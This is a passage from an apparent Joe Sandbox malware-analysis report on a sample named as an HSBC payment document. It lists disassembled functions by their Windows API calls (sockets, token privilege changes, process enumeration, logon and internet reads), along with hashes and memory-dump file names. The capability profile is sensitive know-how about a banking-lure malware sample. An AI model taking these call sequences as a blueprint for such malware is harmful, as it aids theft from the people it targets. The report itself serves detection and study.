socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0079679E
WSAGetLastError.WSOCK32(00000000), ref: 007967C7
bind.WSOCK32(00000000,?,00000010), ref: 00796800
WSAGetLastError.WSOCK32(00000000), ref: 0079680D
closesocket.WSOCK32(00000000,00000000), ref: 00796821

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: fe4ba35db9a66d674c438e384297ba33da544cb8b1f487e4c4fca8e0ace07e69
Instruction ID: 2220765c44567bfdcdcf08e1e20aa1d696d1a3c5d6a4893260f774a3afae79d0
Opcode Fuzzy Hash: fe4ba35db9a66d674c438e384297ba33da544cb8b1f487e4c4fca8e0ace07e69
Instruction Fuzzy Hash: 6A41D475B00220EFDF50AF64AC8AF6E77E8DF49714F488558FA15AB3C2DA789D008791

Function 007A5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007A53C5
IsWindowEnabled.USER32 ref: 007A53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 007A53E0
IsIconic.USER32 ref: 007A53EE
IsZoomed.USER32 ref: 007A53FC

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 8484deec13fa3b03a01f52541be0e28e135e56e525702c221f36b6005b90320e
Instruction ID: d1ab1b6e1330d8cc364bf5242eca3b23d47eb4c9b744fe52799181e1aa3ee96d
Opcode Fuzzy Hash: 8484deec13fa3b03a01f52541be0e28e135e56e525702c221f36b6005b90320e
Instruction Fuzzy Hash: 60112732700921AFDF206F26DC48A2E7B98FFC67A1B448139F845D3241CB7CDC0186A4

Function 007780A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007780C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007780CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007780D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007780E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007780F6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 215c521719b0e54ec499a8f95445cd64ac0ff5cd1501fbb05f62d5a2d04cfc9c
Instruction ID: f9183a42d6b262c30ae0af789edaa38e2e4fb04d50386ae5fc47c9d64f8556cf
Opcode Fuzzy Hash: 215c521719b0e54ec499a8f95445cd64ac0ff5cd1501fbb05f62d5a2d04cfc9c
Instruction Fuzzy Hash: 72F06231240208AFEB501FA5EC8DE673BACEF8A795B508029F949C6150CB699C41DE61

Function 00724B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00724AD0), ref: 00724B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00724B57

Strings

kernel32.dll, xrefs: 00724B40
GetNativeSystemInfo, xrefs: 00724B51

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 210920dd322e45696f2d522e8693b5790142d2138ff71546207e8f68f9c58e14
Instruction ID: fdebff7618a886da0f7c5beaace4f073252719e8e01a4d9e1cec3e9ca5c3d953
Opcode Fuzzy Hash: 210920dd322e45696f2d522e8693b5790142d2138ff71546207e8f68f9c58e14
Instruction Fuzzy Hash: 37D012B4A10727DFD7209FB1E858B4676E5AF86351B11C83DD486D6150D678D480CA68

Function 0079EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0079EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0079EE4B

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Process32NextW.KERNEL32(00000000,?), ref: 0079EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0079EF1A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: a8b84010582c5ebbb464a8df5438052a05beff2927bce30768eb7abb7863ce69
Instruction ID: e499aa6056e043193cc519290dd12d29b1cea989eee7adacc63ddbf646fbe63f
Opcode Fuzzy Hash: a8b84010582c5ebbb464a8df5438052a05beff2927bce30768eb7abb7863ce69
Instruction Fuzzy Hash: 4551AE71104311EFD710EF20EC89E6BB7E8EF88710F44482DF595972A1EB34A908CB92

Function 0077E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0077E628

Strings

(, xrefs: 0077E66E
|, xrefs: 0077E658

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 7985705368f115387f2a461caf0157ca8efdcec5928a5c956b7979c9d44aceac
Instruction ID: 0d26a543d8f376d87f57a916804d547c573874eb05c905f696fb6285bdda5772
Opcode Fuzzy Hash: 7985705368f115387f2a461caf0157ca8efdcec5928a5c956b7979c9d44aceac
Instruction Fuzzy Hash: 82322475A00705DFDB28CF29C48196AB7F1FF48360B15C4AEE99ADB3A1E774A941CB40

Function 007922EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0079180A,00000000), ref: 007923E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00792418

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 009ee524328a39296fe5b5b9887576702f0f065ada7b093edb13831b6afd1856
Instruction ID: 83c7b19465c50409081fab440a7911a0dac6ad034d8685f565e34db269be7993
Opcode Fuzzy Hash: 009ee524328a39296fe5b5b9887576702f0f065ada7b093edb13831b6afd1856
Instruction Fuzzy Hash: C741C471A04209FFEF10FE95EC85EBB77BCEB40314F10406AF641A6152DB7D9E429A60

Function 0078B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0078B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0078B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0078B3EA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c282a892a244934e2dd9703c7dcda450ce3933c5b5f0a5da2abdb8b79446c41c
Instruction ID: f36ab24514001a7b2a1a5dd1093287fc4c8d286d572f36df38aebe8ad0e8b428
Opcode Fuzzy Hash: c282a892a244934e2dd9703c7dcda450ce3933c5b5f0a5da2abdb8b79446c41c
Instruction Fuzzy Hash: ED217135A00518EFCB00EFA5D885EEDBBB8FF49310F1480A9E905AB351CB35A915CB54

Function 007787E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00778858
GetLastError.KERNEL32 ref: 00778865

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 325ef876a82c82b9f08e1db842ff29940b9ec0f2c71f0928ac5d7601b1460aa5
Instruction ID: a002d1e0214ea5b09d025f7128a6e4726f8ddd61c3ca361453e33f04228b619d
Opcode Fuzzy Hash: 325ef876a82c82b9f08e1db842ff29940b9ec0f2c71f0928ac5d7601b1460aa5
Instruction Fuzzy Hash: 21118FB2914204AFEB18EFA4DC89D6BB7F8EB45751B20C52EF45997241EB34BC408B61

Function 0077874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00778774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0077878B
FreeSid.ADVAPI32(?), ref: 0077879B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8caffd8d4944e3c91bd8ba158f9e8d68e0caa8b7187c1b0b0be84df6b5f1ebeb
Instruction ID: b67954a33d3d483a1aa3d161236fd2808eaf0dfae189e0d9c6428fd2c506157c
Opcode Fuzzy Hash: 8caffd8d4944e3c91bd8ba158f9e8d68e0caa8b7187c1b0b0be84df6b5f1ebeb
Instruction Fuzzy Hash: 6DF04975A5130CBFDF04DFF4DC89AAEBBBCEF08201F1084A9E902E2181E6756A048B55

Function 00788889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0078889B

Part of subcall function 0074520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00788F6E,00000000,?,?,?,?,0078911F,00000000,?), ref: 00745213
Part of subcall function 0074520A: __aulldiv.LIBCMT ref: 00745233

Strings

0e~, xrefs: 00788892

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0e~
API String ID: 2893107130-1948122971
Opcode ID: 44b904176e9ef959f6b2c6b77509e6d5d3f2782d1a63a38ded67bf39b6fef629
Instruction ID: bd90dbade1a72e18e5a906b0d7f5f1f0a96c7b2c33e9fe042a7782059a38229e
Opcode Fuzzy Hash: 44b904176e9ef959f6b2c6b77509e6d5d3f2782d1a63a38ded67bf39b6fef629
Instruction Fuzzy Hash: A9217272635650CBC729CF29D881A52B3E1EBA9311B688E6CD1F5CF2D0CA78A905CB54

Function 00784C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00784CB3

Strings

DOWN, xrefs: 00784C98

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: bb5545c38a869c10ddd4caadca8d6b4a51e45cdc3e228bf67be6ef1ddda26c5d
Instruction ID: c482846326346538874e04d54929a8dd6ed7d987ee07ac57f38acb81000a469c
Opcode Fuzzy Hash: bb5545c38a869c10ddd4caadca8d6b4a51e45cdc3e228bf67be6ef1ddda26c5d
Instruction Fuzzy Hash: 62E08CB21DD7223DB9083919FD0BEB7078C8B12331B910207F810E51C2EE9CAC8226B8

Function 0078C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0078C6FB
FindClose.KERNEL32(00000000), ref: 0078C72B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 9cb3cd2a464be57a6a7e7229e872ece88ffd9090d89db24f73d254d74f5be701
Instruction ID: 558658c2a1e71e8b3d1921a55def9a4137c0a9b73fda490c2c4ddd14c81c20ae
Opcode Fuzzy Hash: 9cb3cd2a464be57a6a7e7229e872ece88ffd9090d89db24f73d254d74f5be701
Instruction Fuzzy Hash: C5118E726006009FDB10EF29D849A2AF7E9FF85320F04C51DF9A9C7290DB34AC01CB91

Function 0078A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00799468,?,007AFB84,?), ref: 0078A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00799468,?,007AFB84,?), ref: 0078A0A9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c9ce98651c67fc5823fcb1c5a697c0894d752ee0202770b56fb910e8c1e384de
Instruction ID: b8294d7fd2299a040ef1f1059f55263646ed82fef4e0b8617c62acdd0700a34b
Opcode Fuzzy Hash: c9ce98651c67fc5823fcb1c5a697c0894d752ee0202770b56fb910e8c1e384de
Instruction Fuzzy Hash: 39F0E23514422DBBDB20AFA4CC48FEA736CBF09362F008166F808D2180D674A900CBA1

Function 007781CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00778309), ref: 007781E0
CloseHandle.KERNEL32(?,?,00778309), ref: 007781F2

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: e4642bcd5650422a71a271a9ee568eacf056a3e7384849a24d442d4fc6c75b87
Instruction ID: 4a8599f6fb42a78301b4c1a8310392ed91ef57fa0ae656de93664fb92cf51b7f
Opcode Fuzzy Hash: e4642bcd5650422a71a271a9ee568eacf056a3e7384849a24d442d4fc6c75b87
Instruction Fuzzy Hash: 46E08C32010620EFEB252B71EC08D737BEAEF00310710C82DF9A680430CB36ACA0DB50

Function 0074A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00748D57,?,?,?,00000001), ref: 0074A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0074A163

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 83ee6bf695d2a4d141ad9ad08b2e7a8fd47a7dc416b5b618753c88bbe5bbc851
Instruction ID: ce746cdf00047cbf11f8ba14f18c71714335436056a6976f1aad7c7dcd13e32f
Opcode Fuzzy Hash: 83ee6bf695d2a4d141ad9ad08b2e7a8fd47a7dc416b5b618753c88bbe5bbc851
Instruction Fuzzy Hash: BDB09231054208ABCF002BD1EC59B883F68EB86AA2F408020F60D84060CBA654508A99

Function 0074F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60e5ce3fbf530fcbf04d0f38f7994cd80c72306568a40076ad6077a05c84ef5
Instruction ID: 18fe2f8c556a4ef02a09f2ac28b438585bd23e444cfbdd014af1882301656300
Opcode Fuzzy Hash: e60e5ce3fbf530fcbf04d0f38f7994cd80c72306568a40076ad6077a05c84ef5
Instruction Fuzzy Hash: EE320362D29F414DDB279634D872336A289AFB73C4F15D737E819B5EA6EB2CC4834104

Function 0075242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fecb75795701aeba4b2d621d27f6bef595470dad3f0f453fd2d2a14c7f6e6ee
Instruction ID: 88b687670ee2e6f29ad9c703b94666e2cbffd84f71dd8024d45ef2c03883f8ad
Opcode Fuzzy Hash: 5fecb75795701aeba4b2d621d27f6bef595470dad3f0f453fd2d2a14c7f6e6ee
Instruction Fuzzy Hash: 27B10120E2AF415DD723A6398831336BB9CAFBB2C5F52D71BFC2670D22EB2585834145

Function 007787B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00778389), ref: 007787D1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
